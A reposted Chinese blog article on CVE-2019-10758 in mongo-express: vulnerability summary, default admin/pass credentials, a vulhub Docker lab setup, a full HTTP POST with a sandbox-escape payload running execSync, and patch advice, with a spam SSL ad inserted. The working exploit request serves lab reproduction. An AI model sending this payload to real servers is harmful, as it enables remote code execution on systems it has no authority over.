如何進(jìn)行MongoDBmongo-express遠(yuǎn)程代碼執(zhí)行

這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行MongoDB mongo-express遠(yuǎn)程代碼執(zhí)行，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

皋蘭ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場(chǎng)景，ssl證書(shū)未來(lái)市場(chǎng)廣闊！成為成都創(chuàng)新互聯(lián)的ssl證書(shū)銷(xiāo)售渠道，可以享受市場(chǎng)價(jià)格4-6折優(yōu)惠！如果有意向歡迎電話(huà)聯(lián)系或者加微信：18982081108（備注：SSL證書(shū)合作）期待與您的合作！

漏洞簡(jiǎn)介：

此軟件包的受影響版本容易受到使用toBSON方法的端點(diǎn)通過(guò)遠(yuǎn)程執(zhí)行代碼（RCE）攻擊的攻擊。 在非安全環(huán)境中濫用vm依賴(lài)關(guān)系來(lái)執(zhí)行exec命令。 默認(rèn)用戶(hù)名是admin，密碼是pass。

威脅類(lèi)型

遠(yuǎn)程代碼執(zhí)行

威脅等級(jí)

高

漏洞編號(hào)

CVE-2019-10758

受影響系統(tǒng)及應(yīng)用版本

mongo-express，版本0.54.0及更低版本

不受影響的版本

mongo-express 0.54.0或更高版本。

漏洞復(fù)現(xiàn)：

這個(gè)漏洞環(huán)境感覺(jué)vulhub的就可以滿(mǎn)足，所以選擇搭建vulhub的環(huán)境

vulhub下載

 git clone https://github.com.cnpmjs.org/vulhub/vulhub

這里還有個(gè)小福利，有沒(méi)有覺(jué)得經(jīng)常git clone的時(shí)候特別慢？幾K、十幾K的下載?

為了解決這個(gè)問(wèn)題，嘗試了好多方法，總結(jié)了一個(gè)最有效的方法

git clone的時(shí)候在把https://github.com換成： https://github.com.cnpmjs.org/

這是一個(gè)國(guó)內(nèi)的github鏡像站，下載速度..怎么說(shuō)呢，起飛！

安裝docker（我之前安裝過(guò)）

安裝docker-compose

pip install docker-compose

啟用docker，拉取鏡像，啟動(dòng)環(huán)境

PS:這就又要說(shuō)一個(gè)福利了，docker pull的時(shí)候有沒(méi)有感覺(jué)很慢？放著阿里這么大的靠山得用起來(lái)呀

 https://cr.console.aliyun.com/#/accelerator

登錄阿里云進(jìn)去，左下角有個(gè)docker鏡像加速，按步驟來(lái)，然后...起飛?。?/p>

（都是一個(gè)坑一個(gè)坑摸出來(lái)的...）

至此環(huán)境搭建成功！

環(huán)境啟動(dòng)后，訪(fǎng)問(wèn)http://192.168.192.128:8081即可查看到Web頁(yè)面。

攻擊復(fù)現(xiàn)：

直接發(fā)送如下數(shù)據(jù)包，即可執(zhí)行代碼

POST /checkValid HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Basic YWRtaW46cGFzcw==

Content-Type: application/x-www-form-urlencoded

Content-Length: 124

 

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

Poc目標(biāo)：在/tcp下創(chuàng)建success文件

發(fā)送數(shù)據(jù)包后訪(fǎng)問(wèn)   http://localhost:8081

查看是否創(chuàng)建成功：

docker-compose exec web ls /tmp

成功創(chuàng)建uccess文件，都到這一步了，還能做什么自由發(fā)揮~

ps：此文章僅用于交流學(xué)習(xí)~

2、修復(fù)建議

https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2

 在0.54.0中將bson.js中的vm依賴(lài)刪除，改用mongo-query-parser

關(guān)于如何進(jìn)行MongoDB mongo-express遠(yuǎn)程代碼執(zhí)行就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到。

標(biāo)題名稱(chēng)：如何進(jìn)行MongoDBmongo-express遠(yuǎn)程代碼執(zhí)行
網(wǎng)站地址：http://m.jiaotiyi.com/article/giheoh.html